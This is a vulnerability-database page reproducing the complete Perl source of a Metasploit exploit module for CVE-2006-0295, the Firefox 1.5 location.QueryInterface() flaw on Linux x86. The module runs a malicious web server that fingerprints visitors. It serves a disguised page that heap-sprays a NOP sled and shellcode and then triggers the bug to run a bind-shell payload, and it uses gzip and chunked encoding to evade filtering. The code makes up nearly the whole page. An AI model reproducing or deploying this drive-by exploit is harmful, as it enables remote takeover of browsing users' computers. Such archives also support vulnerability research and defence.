Lucene search

firefox_queryinterface.pm.txt

🗓️ 14 Feb 2006 00:00:00Reported by H D MooreType

packetstorm🔗 packetstormsecurity.com👁 42 Views

Exploit for Firefox location.QueryInterface() Code Execution on Linux x86 syste

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Reporter	Title	Published	Views	Family All 35
Saint	Mozilla Firefox QueryInterface method memory corruption	10 Feb 200600:00	–	saint
Saint	Mozilla Firefox QueryInterface method memory corruption	10 Feb 200600:00	–	saint
Saint	Mozilla Firefox QueryInterface method memory corruption	10 Feb 200600:00	–	saint
Saint	Mozilla Firefox QueryInterface method memory corruption	10 Feb 200600:00	–	saint
exploitpack	Mozilla Firefox 1.5 (Linux) - location.QueryInterface() Code Execution (Metasploit)	7 Feb 200600:00	–	exploitpack
exploitpack	Mozilla Firefox 1.5 (OSX) - location.QueryInterface() Code Execution (Metasploit)	8 Feb 200600:00	–	exploitpack
Packet Storm	firefox_queryinterface_mac.pm.txt	14 Feb 200600:00	–	packetstorm
Packet Storm	Firefox location.QueryInterface() Code Execution	27 Oct 200900:00	–	packetstorm
Cvelist	CVE-2006-0295	2 Feb 200620:00	–	cvelist
0day.today	Mozilla Firefox 1.5 location.QueryInterface() Code Execution (osx)	8 Feb 200600:00	–	zdt

`##  
# This file is part of the Metasploit Framework and may be redistributed  
# according to the licenses defined in the Authors field below. In the  
# case of an unknown or missing license, this file defaults to the same  
# license as the core Framework (dual GPLv2 and Artistic). The latest  
# version of the Framework can always be obtained from metasploit.com.  
##  
  
package Msf::Exploit::firefox_queryinterface_linux;  
  
use strict;  
use base "Msf::Exploit";  
use Pex::Text;  
use IO::Socket::INET;  
use IPC::Open3;  
  
my $advanced =  
{  
'Gzip' => [1, 'Enable gzip content encoding'],  
'Chunked' => [1, 'Enable chunked transfer encoding'],  
};  
  
my $info =  
{  
'Name' => 'Firefox location.QueryInterface() Code Execution (Linux x86)',  
'Version' => '$Revision: 1.1 $',  
'Authors' =>  
[  
'H D Moore <hdm [at] metasploit.com>',  
],  
  
'Description' =>  
Pex::Text::Freeform(qq{  
This module exploits a code execution vulnerability in the Mozilla  
Firefox browser. To reliably exploit this vulnerability, we need to fill  
almost a gigabyte of memory with our nop sled and payload. This module has  
been tested on Gentoo Linux with the stock Firefox 1.5.0 package.  
}),  
  
'Arch' => [ 'x86' ],  
'OS' => [ 'linux' ],  
'Priv' => 0,  
  
'UserOpts' =>  
{  
'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],  
'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],  
},  
  
'Payload' =>  
{  
'Space' => 1024,  
'BadChars' => "\x00",  
'Keys' => ['-bind'],  
},  
'Refs' =>  
[  
['CVE', '2006-0295'],  
['BID', '16476'],  
['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],  
],  
  
'DefaultTarget' => 0,  
'Targets' =>  
[  
[ 'Mozilla Firefox 1.5.0.0 on Linux x86' ]  
],  
  
'Keys' => [ 'mozilla' ],  
  
'DisclosureDate' => 'Feb 02 2006',  
};  
  
sub new {  
my $class = shift;  
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);  
return($self);  
}  
  
sub Exploit  
{  
my $self = shift;  
my $server = IO::Socket::INET->new(  
LocalHost => $self->GetVar('HTTPHOST'),  
LocalPort => $self->GetVar('HTTPPORT'),  
ReuseAddr => 1,  
Listen => 1,  
Proto => 'tcp'  
);  
my $client;  
  
# Did the listener create fail?  
if (not defined($server)) {  
$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));  
return;  
}  
  
my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?  
Pex::Utils::SourceIP('1.2.3.4') :  
$self->GetVar('HTTPHOST');  
  
$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");  
  
while (defined($client = $server->accept())) {  
$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));  
}  
  
return;  
}  
  
sub HandleHttpClient  
{  
my $self = shift;  
my $fd = shift;  
  
# Set the remote host information  
my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);  
  
  
# Read the HTTP command  
my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);  
my $agent;  
  
# Read in the HTTP headers  
while ((my $line = $fd->RecvLine(10))) {  
  
$line =~ s/^\s+|\s+$//g;  
  
my ($var, $val) = split(/\:/, $line, 2);  
  
# Break out if we reach the end of the headers  
last if (not defined($var) or not defined($val));  
  
$agent = $val if $var =~ /User-Agent/i;  
}  
  
my $os = 'Unknown';  
my $vl = ($agent =~ m/\/1\.5$/) ? 'Vulnerable' : 'Not Vulnerable';  
  
$os = 'Linux' if $agent =~ /Linux/i;  
$os = 'Mac OS X' if $agent =~ /OS X/i;  
$os = 'Windows' if $agent =~ /Windows/i;   
  
  
$self->PrintLine("[*] Client connected from $rhost:$rport ($os/$vl).");  
  
if ($os ne 'Linux') {  
$self->PrintLine("[*] Invalid target for this exploit, trying anyways...");  
} else {  
$self->PrintLine("[*] Sending payload and waiting for execution...");   
}  
  
my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));  
  
$fd->Close();  
}  
  
  
sub JSUnescape {  
my $self = shift;  
my $data = shift;  
my $code = '';  
  
# Encode the shellcode via %u sequences for JS's unescape() function  
my $idx = 0;  
while ($idx < length($data) - 1) {  
my $c1 = ord(substr($data, $idx, 1));  
my $c2 = ord(substr($data, $idx+1, 1));   
$code .= sprintf('%%u%.2x%.2x', $c2, $c1);   
$idx += 2;  
}  
  
return $code;  
}  
  
sub GenerateHTML {  
my $self = shift;  
my $target = $self->Targets->[$self->GetVar('TARGET')];  
my $shellcode = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload);  
my $data = qq#  
<html>  
<head>  
<title>One second please...</title>  
<script language="javascript">  
  
function BodyOnLoad() {  
h = FillHeap();  
location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));  
};  
  
function FillHeap() {  
// Filler  
var m = "";  
var h = "";  
var a = 0;  
  
// Nop sled  
for(a=0; a<(1024*512); a++)  
m += unescape("\%u9090");  
  
// Payload  
m += unescape("$shellcode");  
  
// Repeat  
for(a=0; a<1024; a++)  
h += m;  
  
// Return  
return h;  
}  
</script>  
</head>  
<body onload="BodyOnLoad()">  
</body>  
</html>  
#;  
return $data;  
}  
  
sub BuildResponse {  
my ($self, $content) = @_;  
  
my $response =  
"HTTP/1.1 200 OK\r\n" .  
"Content-Type: text/html\r\n";  
  
if ($self->GetVar('Gzip')) {  
$response .= "Content-Encoding: gzip\r\n";  
$content = $self->Gzip($content);  
}  
if ($self->GetVar('Chunked')) {  
$response .= "Transfer-Encoding: chunked\r\n";  
$content = $self->Chunk($content);  
} else {  
$response .= 'Content-Length: ' . length($content) . "\r\n" .  
"Connection: close\r\n";  
}  
  
$response .= "\r\n" . $content;  
  
return $response;  
}  
  
sub Chunk {  
my ($self, $content) = @_;  
  
my $chunked;  
while (length($content)) {  
my $chunk = substr($content, 0, int(rand(10) + 1), '');  
$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";  
}  
$chunked .= "0\r\n\r\n";  
  
return $chunked;  
}  
  
sub Gzip {  
my $self = shift;  
my $data = shift;  
my $comp = int(rand(5))+5;  
  
my($wtr, $rdr, $err);  
  
my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');  
print $wtr $data;  
close ($wtr);  
local $/;  
  
return (<$rdr>);  
}  
1;  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

14 Feb 2006 00:00Current

6.3Medium risk

Vulners AI Score6.3

EPSS0.82372